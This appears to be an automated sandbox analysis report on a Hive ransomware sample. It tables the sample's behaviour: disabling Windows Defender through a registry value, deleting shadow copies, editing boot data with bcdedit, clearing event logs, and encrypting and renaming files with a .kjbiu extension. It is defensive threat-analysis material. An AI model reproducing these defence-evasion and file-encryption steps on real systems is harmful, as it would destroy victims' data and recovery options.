Analysis Overview
SHA256
a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643
Threat Level: Known bad
The file a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643 was found to be: Known bad.
Malicious Activity Summary
Hive
Deletes Windows Defender Definitions
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes shadow copies
Modifies boot configuration data using bcdedit
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Runs net.exe
Interacts with shadow copies
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 10:46
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 10:46
Reported
2022-01-13 10:52
Platform
win10-en-20211208
Max time kernel
94s
Max time network
162s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ResizeSync.tif => C:\Users\Admin\Pictures\ResizeSync.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_EsfX5mnxDno0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\TestRename.raw.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_8P4Gdb82uLo0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportSelect.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_H3zSOkY9NEo0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FormatEnable.crw => C:\Users\Admin\Pictures\FormatEnable.crw.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_R9DFQaGJXVA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GrantInvoke.tif => C:\Users\Admin\Pictures\GrantInvoke.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_KTvDANrgUSA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutReset.tif => C:\Users\Admin\Pictures\OutReset.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_ECUqf9O9L540.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResizeSync.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_EsfX5mnxDno0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FindAdd.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_9nMBv1Bid_E0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OutReset.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_ECUqf9O9L540.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GroupRegister.tif => C:\Users\Admin\Pictures\GroupRegister.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_c6s7jF0nxAk0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GroupRegister.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_c6s7jF0nxAk0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\TestRename.raw => C:\Users\Admin\Pictures\TestRename.raw.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_8P4Gdb82uLo0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportSelect.tif => C:\Users\Admin\Pictures\ExportSelect.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_H3zSOkY9NEo0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FindAdd.tif => C:\Users\Admin\Pictures\FindAdd.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_9nMBv1Bid_E0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatEnable.crw.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_R9DFQaGJXVA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GrantInvoke.tif.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_KTvDANrgUSA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-40_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Backgrounds\Western.jpg | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\xj_60x42.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\2818_48x48x32.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_KMwVcWat3gM0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_cs_135x40.svg.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_vtx97AsGf-A0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons.png.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_FRrwWBKh9h00.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\bi_16x11.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-30_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-32.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\ui-strings.js.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_8YQuErZmYkY0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\index.win32.bundle.map.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_oI_FVAXeQQQ0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\bg6_thumb.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ppd.xrm-ms.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_LQ0a0WUwYBE0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1849_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\9724_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ppd.xrm-ms.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_pZSmJHTEp2U0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\py_16x11.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-48_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\wmplayer.exe.mui | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\spider\2_Piece_Silk_Suit_.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\drunk.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-72_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail2x.png.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_jn80MA_V1Kw0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\tripeaks\Expedition_Leader_.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\tripeaks\Peak_Jumper_.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3009_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\README.txt.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_kOrPZywRQMQ0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-72_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\it-IT.PhoneNumber.model | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\Spider\Goal_4.jpg | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\xj_16x11.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CalibriL.ttf.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_Y6TS_4oN1tY0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_Mlg96aYW4XE0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-ms.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_v6DqWJUOhiI0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-96.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_PL-PL.respack | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.ViewerPlugin\CinemagraphDelegate\CinemagraphControl.xaml | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\LargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_OIFiiUelebk0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Light.scale-200.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_AaxDsdvqf4Q0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul.xrm-ms.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_H0TAZVoeJ9o0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\keychain.3mf | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageSplashScreen.scale-100.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-36.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxAccountsSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-pl.xrm-ms.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_OVRVFIMBRvU0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_tripeaks.jpg | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Outlook.scale-200.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\ado\msadox28.tlb | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedStoreLogo.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\sn_16x11.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7656_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_MazTlw8Hk1Y0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa.NYpvWf8fF1OizfC5ZyJz8Ry_IwGTeq1o9I8QKDHQydT_nixaPJMJSR40.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
